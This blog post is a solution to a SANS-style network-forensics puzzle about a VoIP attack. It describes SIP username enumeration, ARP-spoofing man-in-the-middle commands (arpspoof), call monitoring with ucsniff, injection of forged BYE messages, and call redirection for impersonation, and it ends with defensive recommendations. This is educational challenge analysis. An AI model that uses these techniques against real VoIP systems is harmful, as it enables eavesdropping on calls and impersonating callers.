My Solution to The Nightmare Before Charlie Brown’s Christmas

4 01 2011

Merry Christmas and happy new year to you all 🙂 !! I spent sometimes during the new year festival tackling this problem. You can read the whole question here: The Nightmare Before Charlie Brown’s Christmas by Ed Skoudis

My Proposed Solution:
1.) What was the purpose of Jack’s commands shown above?
Jack tried to search for any VOIP device utilising SIP. Firstly, he received IP address and got network address for the up-coming attack. Then, he used Metasploit and spotted the Asterisk PBX serving SIP at IP: which was on the same subnet as Jack’s laptop. He knew the supported methods on the box, too. After he met the SIP proxy server, he did information gathering by enumerating numeric username between 1000 and 1100. The methods–OPTIONS and REGISTER—were used in this step. The mechanism behind this was called as Enumerating SIP usernames with Error Messages. In brief, SIP
username can be enumerated by sending REGISTER or INVITE request with a username to SIP proxy server or registrar. The response message with 401 code will be thrown back if it is a valid username. For an invalid one, the target server will respond with 403 code.

2.) What was Jack’s big plan?
Jack’s big plan was to launch infrastructure server impersonation attack. He needed to spoof his laptop as SIP proxy server and registrar. Therefore, he could possess the ability to listen to the conversation, and could masquerade as someone else in order to deceive the caller.

3.) What tools and techniques could Jack have used to implement the whole attack, particularly the ability to listen to conversations in real time, and to inject his message with precision? Please be specific and chronological.

Attacking Sequences
3.1 Packet #4524 Time: 2008-12-02 09:21:25
Jack did arp spoofing to the gateway with the aim of masquerading as SIP proxy server and registrar. MITM attack was submitted after he did another arp spoofing to the real SIP proxy server.
> arpspoof –t
> arpspoof –t

3.2 Packet#Time: 2008-12-02 09:22:09
After User 1002 and 1003 registered, 1003 send INVITE to 1002. During this time, Jack could listen to the whole conversation. Jack could monitor the conversation with ucsniff in monitor mode.
> ucsniff –I eth0 –M

3.3 Packet# 15514 2008-12-02 09:23:07
Jack injected a BYE message to user 1002 by deceiving that it was sent from the real SIP proxy server on behalf of user 1003. In facts, Jack really did it himself. To inject SIP message SiVUS from (dead link—can be downloaded from and SIPp can do this.

3.4 Packet# 15898 2008-12-02 09:23:58
User 1003 realised there was no response from user 1002, he sent BYE to user 1002, but it was intercepted by Jack. User 1003 re-dialed user 1002 again, this time infrastructure server impersonation attack was introduced. We can notice from the status 301: Move Permanently. User 1003’s call was redirected to user 1005 who was Jack.

4) How could Linus have defended the infrastructure against Jack’s tactics?
Linus needed to deploy encryption mechanism over session and media layer of VOIP infrastructure. SIP over TLS must be implemented to encrypt the session layer between SIP user agents and SIP proxy servers. Digital certificate issued by a certificate authority should be used instead of self-signed certificate. Moreover, SRTP must be used in order to make sure that media stream is encrypted as well. Another thing, Linus can do is to deploy IPS. He need to prevent arp spoofing attack from the lesson he learned.

5) How can Linus set things right?

Firstly, Linus must filter Jack’s MAC address on the switch by moving Jack’s port to another unused VLAN. Then, he needed to stop VOIP service, and clear ARP record on the gateway and SIP proxy server before start VOIP service again. For the long term plan, Linus should follow the above suggested ways to
improve the current VOIP infrastructure.

Thanks Ed for the questions. Another skills of mine have been sharpened.



Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s

%d bloggers like this: